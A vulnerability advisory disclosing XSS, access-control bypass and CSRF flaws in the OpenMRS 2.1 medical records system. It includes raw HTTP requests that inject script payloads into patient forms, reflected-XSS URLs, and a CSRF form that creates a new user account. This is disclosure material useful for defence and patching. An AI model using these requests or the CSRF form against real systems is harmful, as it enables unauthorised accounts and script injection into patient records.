OpenMRS 2.1 Access Bypass / XSS / CSRF

2014.10.21
Credit: Mahendra
Risk: Medium
Local: No
Remote: Yes

# Exploit Title: OpenMRS 2.1 (Standalone version) Multiple Security Vulnerabilities # Date: 20/10/2014 # Remote: Yes # Exploit Author: Mahendra # Vendor Homepage: http://openmrs.org # Software Link: http://sourceforge.net/projects/openmrs/files/releases/OpenMRS_2.1/openmrs-2.1-standalone.zip/download # Version: 2.1 Standalone Timeline: 10-10-2014: Issues raised in OpenMRS Jira platform 20-10-2014: No responses received. Advisory released --------------------------------------------------------------- About OpenMRS --------------------------------------------------------------- OpenMRS is a software platform and a reference application which enables design of a customized medical records system with no programming knowledge (although medical and systems analysis knowledge is required). It is a common platform upon which medical informatics efforts in developing countries can be built. The system is based on a conceptual database structure which is not dependent on the actual types of medical information required to be collected or on particular data collection forms and so can be customized for different uses. OpenMRS is now in use around the world (see the OpenMRS Atlas), including South Africa, Kenya, Rwanda, Lesotho, Zimbabwe, Mozambique, Uganda, Tanzania, Haiti, India, China, United States, Pakistan, the Phillipines, and many other places. This work is supported in part by many organizations including international and government aid groups, NGOs, aswell as for-profit and non-profit corporations. ---------------------------------------------------------------------- Multiple Persistent and Reflected Cross-Site Scripting (CVE-2014-8071) ---------------------------------------------------------------------- Persistent XSS Parameters that are displayed back to the user are mostly vulnerable to cross-site scripting as user input was not validate properly and as a result, the malicious script was stored by the application and executed when it was displayed back to the user. Below are several examples on the persistent and reflected XSS identified in OpenMRS 2.1 Standalone ------------------------- Register a patient page ------------------------- POST /openmrs-standalone/registrationapp/registerPatient.page?appId=referenceapplication.registrationapp.registerPatient HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8081/openmrs-standalone/registrationapp/registerPatient.page?appId=referenceapplication.registrationapp.registerPatient Cookie: referenceapplication.lastSessionLocation=3; dashboardTab-1=patientOverviewTab; JSESSIONID=9B21E253E4BEC8E8C07155C00CD54EE6 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 393 givenName=<script>alert(1)</script>&familyName=<script>alert(1)</script>&preferred=true&gender=M&birthdateDay=1&birthdateMonth=12&birthdateYear=1989&birthdateYears=&birthdateMonths=&birthdate=1989-12-1&address1=<script>alert(1)</script>&address2=<script>alert(1)</script>&cityVillage=&stateProvince=&country=&postalCode=&phoneNumber=1111 -------------- Allergy page -------------- POST /openmrs-standalone/allergyui/allergy.page?patientId=82& HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8081/openmrs-standalone/allergyui/allergy.page?patientId=82& Cookie: referenceapplication.lastSessionLocation=3; dashboardTab-1=patientOverviewTab; JSESSIONID=9B21E253E4BEC8E8C07155C00CD54EE6 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 212 allergenType=DRUG&codedAllergen=162298&nonCodedAllergen=&nonCodedAllergen=&nonCodedAllergen=&allergyReactionConcepts=108&reactionNonCoded=&severity=1498&comment=%3Cscript%3Ealert%28%22comment%22%29%3C%2Fscript%3E ---------------- Visit Note page ---------------- POST /openmrs-standalone/htmlformentryui/htmlform/enterHtmlForm/submit.action?successUrl=%2Fopenmrs-standalone%2Fhtmlformentryui%2Fhtmlform%2FenterHtmlFormWithStandardUi.page%3FreturnUrl%3D%2F%2Fwww.google.com%26definitionUiResource%3Dreferenceapplication%3Ahtmlforms%2FsimpleVisitNote.xml%26visitId%3D181fdb76-3e9e-485e-b0cb-4dea548236c7%26patientId%3Db675c8d5-c189-4601-af53-b192941b2c47%26 HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://localhost:8081/openmrs-standalone/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page?patientId=b675c8d5-c189-4601-af53-b192941b2c47&visitId=181fdb76-3e9e-485e-b0cb-4dea548236c7&definitionUiResource=referenceapplication:htmlforms/simpleVisitNote.xml&returnUrl=//www.google.com Content-Length: 266 Cookie: referenceapplication.lastSessionLocation=3; dashboardTab-1=patientOverviewTab; JSESSIONID=9B21E253E4BEC8E8C07155C00CD54EE6 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache personId=82&htmlFormId=2&createVisit=false&formModifiedTimestamp=1412599994000&encounterModifiedTimestamp=0&visitId=509&returnUrl=%2F%2Fwww.google.com&closeAfterSubmission=null&w1=4&w3=2&w5=2014-10-10&encounterDiagnoses=%5B%5D&w10=%3Cscript%3Ealert(2)%3C%2Fscript%3E Reflected XSS ----------------- Referer HTTP Header GET /openmrs-standalone/login.htm HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://www.google.com/search?hl=en&q=74b9b"><script>alert(1)</script>e2a35 Cookie: referenceapplication.lastSessionLocation=3; JSESSIONID=9B21E253E4BEC8E8C07155C00CD54EE6 Connection: keep-alive http://localhost:8081/openmrs-standalone/htmlformentryui/htmlform/enterHtmlFormWithStandardUi.page?patientId=b675c8d5-c189-4601-af53-b192941b2c47&visitId=181fdb76-3e9e-485e-b0cb-4dea548236c7&definitionUiResource=referenceapplication:htmlforms/simpleVisitNote.xml&returnUrl=test<script>alert(1)</script> http://localhost:8081/openmrs-standalone/htmlformentryui/htmlform/enterHtmlFormWithSimpleUi.page?patientId=31&visitId=1061bc20<script>alert(1)</script>92b77&definitionUiResource=referenceapplication:htmlforms/vitals.xml&returnUrl=/openmrs-standalone/coreapps/patientdashboard/patientDashboard.page?patientId=31& http://localhost:8081/openmrs-standalone/coreapps/mergeVisits.page?patientId=31&returnUrl=</script><script>alert(1)</script> ----------------------------------------------------------------------- Access control bypass to administrative interface by non-admin user (CVE-2014-8072) ----------------------------------------------------------------------- Any non-admin user can access the administration module with read access by simply browse directly to the administration URL. http://localhost:8081/openmrs-standalone/admin ------------------------------------------------------------------------ Cross-site request forgery (CVE-2014-8073) ------------------------------------------------------------------------ <html> <body> <form action="http://localhost:8081/openmrs-standalone/admin/users/user.form" method="POST"> <input type="hidden" name="createNewPerson" value="true" /> <input type="hidden" name="person&#46;names&#91;0&#93;&#46;givenName" value="test" /> <input type="hidden" name="person&#46;names&#91;0&#93;&#46;middleName" value="test" /> <input type="hidden" name="person&#46;names&#91;0&#93;&#46;familyName" value="test" /> <input type="hidden" name="person&#46;gender" value="M" /> <input type="hidden" name="username" value="test" /> <input type="hidden" name="userFormPassword" value="Admin123" /> <input type="hidden" name="confirm" value="Admin123" /> <input type="hidden" name="roleStrings" value="Application&#58;&#32;Registers&#32;Patients" /> <input type="hidden" name="roleStrings" value="Application&#58;&#32;Uses&#32;Patient&#32;Summary" /> <input type="hidden" name="secretQuestion" value="" /> <input type="hidden" name="secretAnswer" value="" /> <input type="hidden" name="action" value="Save&#32;User" /> <input type="submit" value="Submit request" /> </form> </body> </html>

References:

http://sourceforge.net/projects/openmrs/files/releases/OpenMRS_2.1/openmrs-2.1-standalone.zip/download


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top